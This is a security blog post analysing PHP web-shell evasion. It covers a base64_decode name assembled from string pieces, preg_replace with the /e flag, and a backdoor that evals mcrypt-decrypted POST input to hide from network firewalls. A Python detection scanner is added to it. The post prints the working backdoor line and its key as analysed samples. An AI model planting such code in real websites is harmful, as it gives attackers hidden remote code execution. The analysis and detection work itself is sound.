Backdoor Evasion Using Encrypted Content

October 28, 2013, by Daniel Cid

A few weeks ago on the Sucuri Research Labs we mentioned a new type of malware injection that does not call base64_decode by name; instead it conceals the function name in a variable, built from the combination “base_” + (32*2) + “_decode”. This is the part of the code where it is hidden:

$g___g_='base'.(32*2).'_de'.'code';

Any tool that looks for eval followed by base64_decode, or that simply flags any literal use of base64_decode, will not find it.

That’s just one of the common types of evasion methods used by the bad guys. Another one we see often is the mix of “preg_replace” with the “e” flag, which executes (evals) the replacement content. The attackers do not stop there, though.

Network Evasion using mcrypt

Website firewalls are becoming more common as website owners realize the need to protect their sites and block attacks before they can do much damage. We are seeing some new types of backdoors created with the purpose of evading those firewalls. Instead of sending the malicious payload over the wire in the clear, the attackers encrypt it using “mcrypt_encrypt”, so anyone monitoring the traffic on the network (either with an intrusion detection system or a firewall) won’t know what is being sent.

When the request arrives at the backdoor, “mcrypt_decrypt” is used, and the result is executed (eval’d). This is one example of a backdoor that does it:

if (isset($_POST["\x63o\x64e"])){eval (mcrypt_decrypt(MCRYPT_RIJNDAEL_256,"z\x73\x43T\x6bw\x35x",base64_decode($_POST["\x63o\x64e"]),MCRYPT_MODE_ECB));}exit;?>

For reference, we have it fully decoded on ddecode. It basically takes the content of the POST request variable “code” and decrypts it with Rijndael (a symmetric encryption algorithm) using the key “zsCTkw5x”. If you don’t know the key, you would never be able to decrypt what is being sent. This is the decoded snippet core of the backdoor:

eval (mcrypt_decrypt (MCRYPT_RIJNDAEL_256,"zsCTkw5x",

And we see it injected with different keys on different sites. What is interesting is that this backdoor is not very concerned about evading file-level detection, only network-level monitoring. So it is easy to detect once you get access to the compromised site.

As always, it shows the arms race between the attackers and the defenders. Note that even though this type of backdoor can’t really be decoded or analyzed at the network level, anyone using our Website Firewall is protected due to our virtual hardening.
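As an added illustration (not code from this post or from Sucuri's tools), here is a small Python scanner that takes the file-level view described above: it undoes the string-concatenation, constant-arithmetic and \xNN tricks shown earlier, then flags the three patterns the post discusses (an assembled base64_decode, eval of mcrypt_decrypt output, and preg_replace with the e modifier). The sample inputs are constructed to mirror the snippets above; the finding strings are my own.

```python
import re

# Constructed samples modelled on the snippets in the post (hex escapes written
# as the PHP source carries them); not copied from any live infection.
SAMPLE_OBFUSCATED_B64 = "$g___g_='base'.(32*2).'_de'.'code'; eval($g___g_($_POST['p']));"
SAMPLE_MCRYPT_BACKDOOR = (
    'if (isset($_POST["\\x63o\\x64e"])){eval (mcrypt_decrypt(MCRYPT_RIJNDAEL_256,'
    '"z\\x73\\x43T\\x6bw\\x35x",base64_decode($_POST["\\x63o\\x64e"]),MCRYPT_MODE_ECB));}exit;'
)
SAMPLE_PREG_E = 'preg_replace("/.*/e", $_POST["c"], "");'

_DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')             # double-quoted PHP string
_HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')               # \xNN escape
_ARITH = re.compile(r'\(\s*(\d+)\s*([*+-])\s*(\d+)\s*\)')   # (32*2)-style constants
_TOKEN = r'''(?:'([^']*)'|"([^"]*)"|(?<![\w$])(\d+))'''       # quoted string or int literal
_CONCAT = re.compile(_TOKEN + r'\s*\.\s*' + _TOKEN)         # 'a'.'b'  or  'a'.64

def normalize(src: str) -> str:
    """Undo the cheap obfuscations the post describes so literal names reappear."""
    # 1. \xNN escapes only have meaning inside double-quoted PHP strings.
    src = _DQ_STRING.sub(lambda m: '"' + _HEX_ESC.sub(
        lambda h: chr(int(h.group(1), 16)), m.group(1)) + '"', src)
    # 2. Fold constant integer arithmetic such as (32*2) -> 64.
    def fold(m):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        return str(a * b if op == '*' else a + b if op == '+' else a - b)
    # 3. Join adjacent literals glued with '.', repeating until nothing changes.
    def join(m):
        return "'" + ''.join(g for g in m.groups() if g is not None) + "'"
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(join, _ARITH.sub(fold, src))
    return src

def scan(src: str) -> list:
    """Return file-level findings for the evasion tricks discussed in the post."""
    norm = normalize(src)
    findings = []
    if 'base64_decode' in norm and 'base64_decode' not in src:
        findings.append('base64_decode assembled at runtime (hidden from literal grep)')
    if re.search(r'eval\s*\(\s*mcrypt_decrypt\s*\(', norm):
        m = re.search(r'''mcrypt_decrypt\s*\(\s*\w+\s*,\s*(['"])([^'"]*)\1''', norm)
        key = m.group(2) if m else '?'
        findings.append(f'eval of mcrypt_decrypt output (key {key!r}); payload is encrypted on the wire')
    if re.search(r'''preg_replace\s*\(\s*(['"])(\W)(?:(?!\2).)*\2[a-zA-Z]*e[a-zA-Z]*\1''', norm):
        findings.append('preg_replace with /e modifier (evaluates replacement)')
    return findings

if __name__ == '__main__':
    for sample in (SAMPLE_OBFUSCATED_B64, SAMPLE_MCRYPT_BACKDOOR, SAMPLE_PREG_E):
        print(scan(sample))
```

Run it over a suspect file's contents to get the decoded key and parameter name without ever needing the network traffic, which is exactly the access a cleanup on the compromised host gives you.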

Categories: Website Malware Infections. Tags: Encryption, Hacked Websites, Malware Updates, Website Backdoor

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Comments

  1. Friv Jogos

    November 6, 2013

    Very useful and supportive article. I wish I could do all of that in a short period of time.

  2. botak

    November 14, 2013

    just do in php 5.3
